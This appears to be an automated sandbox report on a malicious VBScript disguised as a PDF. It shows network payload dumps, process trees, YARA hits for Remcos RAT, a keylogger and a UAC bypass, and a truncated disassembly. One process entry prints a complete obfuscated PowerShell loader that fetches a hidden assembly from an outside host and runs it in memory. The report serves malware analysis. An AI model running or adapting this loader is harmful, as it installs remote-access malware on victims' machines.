                                                                                                                      2024-12-09 15:34:29 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 31 38 26 6d 69 6e 5f 72 74 74 3d 31 35 31 31 26 72 74 74 5f 76 61 72 3d 35 38 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 35 37 35 30 36 26 63 77 6e 64 3d 31 36 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 62 34 32 61 61 65 38 62 65 34 31 32 63 64 64 26 74 73 3d 34 35 39 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                      Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1511&rtt_var=582&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1857506&cwnd=162&unsent_bytes=0&cid=9b42aae8be412cdd&ts=459&x=0"
                                                                                                                      2024-12-09 15:34:29 UTC1243INData Raw: 33 38 33 35 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                                                      Data Ascii: 3835AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f
                                                                                                                      Data Ascii: gDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d
                                                                                                                      Data Ascii: Dx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NM
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c
                                                                                                                      Data Ascii: 61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwL
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44
                                                                                                                      Data Ascii: 6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeD
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41
                                                                                                                      Data Ascii: AAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAA
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35
                                                                                                                      Data Ascii: xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44
                                                                                                                      Data Ascii: NPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwD
                                                                                                                      2024-12-09 15:34:29 UTC1369INData Raw: 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72
                                                                                                                      Data Ascii: 5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+Mr


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:10:33:59
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                                                                                                                      Imagebase:0x7ff7731c0000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:10:34:00
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:34:00
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:10:34:25
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
                                                                                                                      Imagebase:0x7ff6c3730000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:10:34:26
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:10:34:28
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:wscript.exe C:\ProgramData\classers.vbs
                                                                                                                      Imagebase:0x7ff7731c0000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:14
                                                                                                                      Start time:10:34:29
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      Imagebase:0x20000
                                                                                                                      File size:262'432 bytes
                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:10:34:30
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      Imagebase:0xb50000
                                                                                                                      File size:262'432 bytes
                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:18
                                                                                                                      Start time:10:34:36
                                                                                                                      Start date:09/12/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff7403e0000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:5.9%
                                                                                                                        Total number of Nodes:1381
                                                                                                                        Total number of Limit Nodes:62
                                                                                                                        execution_graph 46126 41d4d0 46127 41d4e6 ctype ___scrt_fastfail 46126->46127 46141 41d6e3 46127->46141 46147 431f99 21 API calls ___crtLCMapStringA 46127->46147 46130 41d6f4 46131 41d734 46130->46131 46139 41d760 46130->46139 46143 431f99 21 API calls ___crtLCMapStringA 46130->46143 46132 41d696 ___scrt_fastfail 46132->46131 46148 431f99 21 API calls ___crtLCMapStringA 46132->46148 46136 41d72d ___scrt_fastfail 46136->46131 46144 43264f 46136->46144 46137 41d6be ___scrt_fastfail 46137->46131 46149 431f99 21 API calls ___crtLCMapStringA 46137->46149 46139->46131 46150 41d474 21 API calls ___scrt_fastfail 46139->46150 46141->46131 46142 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46141->46142 46142->46130 46143->46136 46151 43256f 46144->46151 46146 432657 46146->46139 46147->46132 46148->46137 46149->46141 46150->46131 46152 432588 46151->46152 46156 43257e 46151->46156 46152->46156 46157 431f99 21 API calls ___crtLCMapStringA 46152->46157 46154 4325a9 46154->46156 46158 43293a CryptAcquireContextA 46154->46158 46156->46146 46157->46154 46159 432956 46158->46159 46160 43295b CryptGenRandom 46158->46160 46159->46156 46160->46159 46161 432970 CryptReleaseContext 46160->46161 46161->46159 46162 426030 46167 4260f7 recv 46162->46167 46168 44e8b6 46169 44e8c1 46168->46169 46170 44e8e9 46169->46170 46171 44e8da 46169->46171 46174 44e8f8 46170->46174 46190 455573 27 API calls 2 library calls 46170->46190 46189 445354 20 API calls _abort 46171->46189 46177 44b9be 46174->46177 46176 44e8df ___scrt_fastfail 46178 